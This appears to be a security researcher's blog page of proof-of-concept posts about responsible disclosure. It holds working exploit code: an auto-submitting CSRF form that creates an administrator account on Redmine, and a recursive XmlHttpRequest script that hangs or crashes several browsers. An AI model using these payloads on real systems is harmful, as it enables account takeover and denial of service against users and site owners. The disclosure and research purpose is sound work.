I've recently released two proof-of-concepts for jCart application and Simpli Easy Newsletter (formerly AFC Simple Newsletter) script. Both of these disclosures were pretty exciting actually.
As a responsible security researcher, I first contacted both vendors.
Guy from Simpli Easy Newsletter quickly replied. He said: Thanks, I'll let my friend know so he can fix.
Funny, isn't it? Three weeks have passed, but his friend did nothing and further emails from me were ignored. So, my disclosure was responsible in effect.
Absolutely different situation happened to jCart. I sent an email to its vendor, but didn't receive any reply and in a couple of days released vulnerabilities. Some time later I received annoyed email from Doug Whitney (jCart guy), where he explained that I was wrong not contacting him first. Of course, I forwarded him my previous email and, what's funny, everything was correct, but it got into Spam box. So, was it responsible disclosure or not? Anyhow, it was pretty funny.
Showing posts with label poc. Show all posts
Showing posts with label poc. Show all posts
10/30/2010
11/17/2009
Redmine CSRF Add Admin User PoC
Redmine, a flexible project management web application, which is used by many companies, including company, where I work, till this day was vulnerable to CSRF from task updating to administration. So, the easiest and the most critical PoC I could code was the one that creates user with administrative rights.
I've contacted Redmine's SecTeam and they rapidly released new version and separate patch (they are cool team, actually). Those, who use it, need to update asap, because this vulnerability is a critical one.
<form method=POST action="http://www.site.org/users/new">
<input type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
<input type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
<input type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
<input type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
<input type="password" size="25" name="password" id="password" value="hacker" />
<input type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
<input type="checkbox" value="1" name="user[admin]" id="user_admin"/>
<input type="hidden" value="1" name="user[admin]"/>
<input type="submit" value="Create" id="commit" name="commit" />
</form>
<script>document.getElementById("commit").click();</script>
Exploit is here
EDIT: It seems that Redmine was not fixed in new version :) Maybe there were some problems with my local version, but token was generated one time and for all users. I've reached them, so gotta be fixed finally.
9/11/2009
IE 7.x/8.x, Opera 10.x, Safari 4.x DoS PoC
While playing around with cross-domain requests, I've noticed that page, containing cycled XmlHttpRequest leads to violation of normal behavior of different browsers.
MS Internet Explorer 7.x/8.x (haven't got 6.x, but sure it's affected) begins to devour system resources (CPU and memory), shows error message "Stack Overflow at line: 43" and stops processing the page in few seconds.
Opera 10.x crashes in few seconds and its crash probably may lead to execution of shellcode (debugged it with WinDbg and !exploitable).
Apple Safari 4.x simply hangs, devouring system resources.
However, Mozilla Firefox 3.5 and Google Chrome can handle this exploit.
Vendors have been contacted, but no reaction.
I've posted this very dirty PoC at sla.ckers and finally it's here.
So, to test this PoC, create a page containing exploit, place it to your local webserver (any LAMP) or website and open it.
PoC contains cross-domain XmlHttp function and cycled asynchronous XmlHttpRequest.
MS Internet Explorer 7.x/8.x (haven't got 6.x, but sure it's affected) begins to devour system resources (CPU and memory), shows error message "Stack Overflow at line: 43" and stops processing the page in few seconds.
Opera 10.x crashes in few seconds and its crash probably may lead to execution of shellcode (debugged it with WinDbg and !exploitable).
Apple Safari 4.x simply hangs, devouring system resources.
However, Mozilla Firefox 3.5 and Google Chrome can handle this exploit.
Vendors have been contacted, but no reaction.
I've posted this very dirty PoC at sla.ckers and finally it's here.
So, to test this PoC, create a page containing exploit, place it to your local webserver (any LAMP) or website and open it.
PoC contains cross-domain XmlHttp function and cycled asynchronous XmlHttpRequest.
<script>
function getXmlHttp(){
var xmlhttp;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp = false;
}
}
if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
xmlhttp = new XMLHttpRequest();
}
return xmlhttp;
}
</script>
<script>
function getXmlHttpSploit(){
var xmlhttp = getXmlHttp()
xmlhttp.open('GET', 'nonexistentpage', false);
xmlhttp.send(null);
if(xmlhttp.status == 404) {
getXmlHttpSploit();
}
}
</script>
<script>
var xmlhttp = getXmlHttp()
xmlhttp.open('GET', 'nonexistentpage', true);
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4) {
if(xmlhttp.status == 404) {
getXmlHttpSploit();
}
}
};
xmlhttp.send(null);
</script>
Subscribe to:
Posts (Atom)